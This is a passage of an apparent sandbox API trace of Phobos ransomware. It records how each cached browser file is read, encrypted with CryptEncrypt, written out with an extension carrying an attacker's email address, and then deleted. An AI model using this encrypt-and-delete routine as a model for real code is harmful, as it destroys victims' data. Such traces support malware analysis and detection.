pdwDataLen=0x2a0fa80*=0x40) returned 1 [0185.155] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.155] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0185.155] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0185.155] CloseHandle (hObject=0x140) returned 1 [0185.155] CloseHandle (hObject=0x14c) returned 1 [0185.155] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA6SFRQ[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa6sfrq[2].png")) returned 1 [0185.156] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1xJF[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1xjf[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.156] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=705) returned 1 [0185.157] CloseHandle (hObject=0x14c) returned 1 [0185.157] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1xJF[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1xjf[1].png")) returned 0x2020 [0185.157] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1xJF[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1xjf[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1xJF[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1xjf[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.157] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.157] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1xJF[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1xjf[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0185.157] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0185.157] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.157] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2c1, lpOverlapped=0x0) returned 1 [0185.159] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d0, dwBufLen=0x2d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d0) returned 1 [0185.159] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2d0, lpOverlapped=0x0) returned 1 [0185.160] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0185.160] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.160] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0185.160] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.160] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0185.160] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0185.160] CloseHandle (hObject=0x14c) returned 1 [0185.160] CloseHandle (hObject=0x140) returned 1 [0185.160] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1xJF[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1xjf[1].png")) returned 1 [0185.161] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAlG41q[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aalg41q[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0185.161] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1976) returned 1 [0185.161] CloseHandle (hObject=0x140) returned 1 [0185.161] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAlG41q[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aalg41q[1].jpg")) returned 0x2020 [0185.161] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAlG41q[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aalg41q[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAlG41q[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aalg41q[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0185.161] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.161] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAlG41q[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aalg41q[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.162] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0185.162] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.162] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7b8, lpOverlapped=0x0) returned 1 [0185.174] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7c0, dwBufLen=0x7c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7c0) returned 1 [0185.174] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7c0, lpOverlapped=0x0) returned 1 [0185.175] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0185.175] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.175] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0185.175] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.175] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0185.175] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0185.176] CloseHandle (hObject=0x140) returned 1 [0185.176] CloseHandle (hObject=0x14c) returned 1 [0185.176] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAlG41q[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aalg41q[1].jpg")) returned 1 [0185.177] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAnhRyj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aanhryj[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.177] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=14001) returned 1 [0185.177] CloseHandle (hObject=0x14c) returned 1 [0185.177] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAnhRyj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aanhryj[1].jpg")) returned 0x2020 [0185.177] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAnhRyj[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aanhryj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAnhRyj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aanhryj[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.177] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.177] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAnhRyj[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aanhryj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0185.178] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0185.178] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.178] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x36b1, lpOverlapped=0x0) returned 1 [0185.181] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x36c0, dwBufLen=0x36c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x36c0) returned 1 [0185.181] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x36c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x36c0, lpOverlapped=0x0) returned 1 [0185.182] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0185.182] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.182] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0185.182] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.182] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0185.182] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0185.182] CloseHandle (hObject=0x14c) returned 1 [0185.182] CloseHandle (hObject=0x140) returned 1 [0185.183] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAnhRyj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aanhryj[1].jpg")) returned 1 [0185.183] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\activityi;src=2542116;cat=chrom00;type=clien612;ord=2366422437621[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0185.185] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=927) returned 1 [0185.185] CloseHandle (hObject=0x140) returned 1 [0185.185] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\activityi;src=2542116;cat=chrom00;type=clien612;ord=2366422437621[1].htm")) returned 0x2020 [0185.186] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\activityi;src=2542116;cat=chrom00;type=clien612;ord=2366422437621[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\activityi;src=2542116;cat=chrom00;type=clien612;ord=2366422437621[1].htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0185.186] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.186] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0185.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\activityi;src=2542116;cat=chrom00;type=clien612;ord=2366422437621[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0185.187] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0185.187] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.187] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x39f, lpOverlapped=0x0) returned 1 [0185.190] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3a0, dwBufLen=0x3a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3a0) returned 1 [0185.191] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3a0, lpOverlapped=0x0) returned 1 [0185.192] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328a8) returned 1 [0185.192] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0185.192] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0185.192] CryptDestroyKey (hKey=0xa328a8) returned 1 [0185.192] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x172, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x172, lpOverlapped=0x0) returned 1 [0185.192] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.192] CloseHandle (hObject=0x140) returned 1 [0185.192] CloseHandle (hObject=0x14c) returned 1 [0185.192] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\activityi;src=2542116;cat=chrom00;type=clien612;ord=2366422437621[1].htm")) returned 1 [0185.193] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0185.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adex[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adex[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0185.196] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=37341) returned 1 [0185.196] CloseHandle (hObject=0x160) returned 1 [0185.196] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adex[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adex[1].js")) returned 0x2020 [0185.196] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adex[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\adex[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\adex[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet 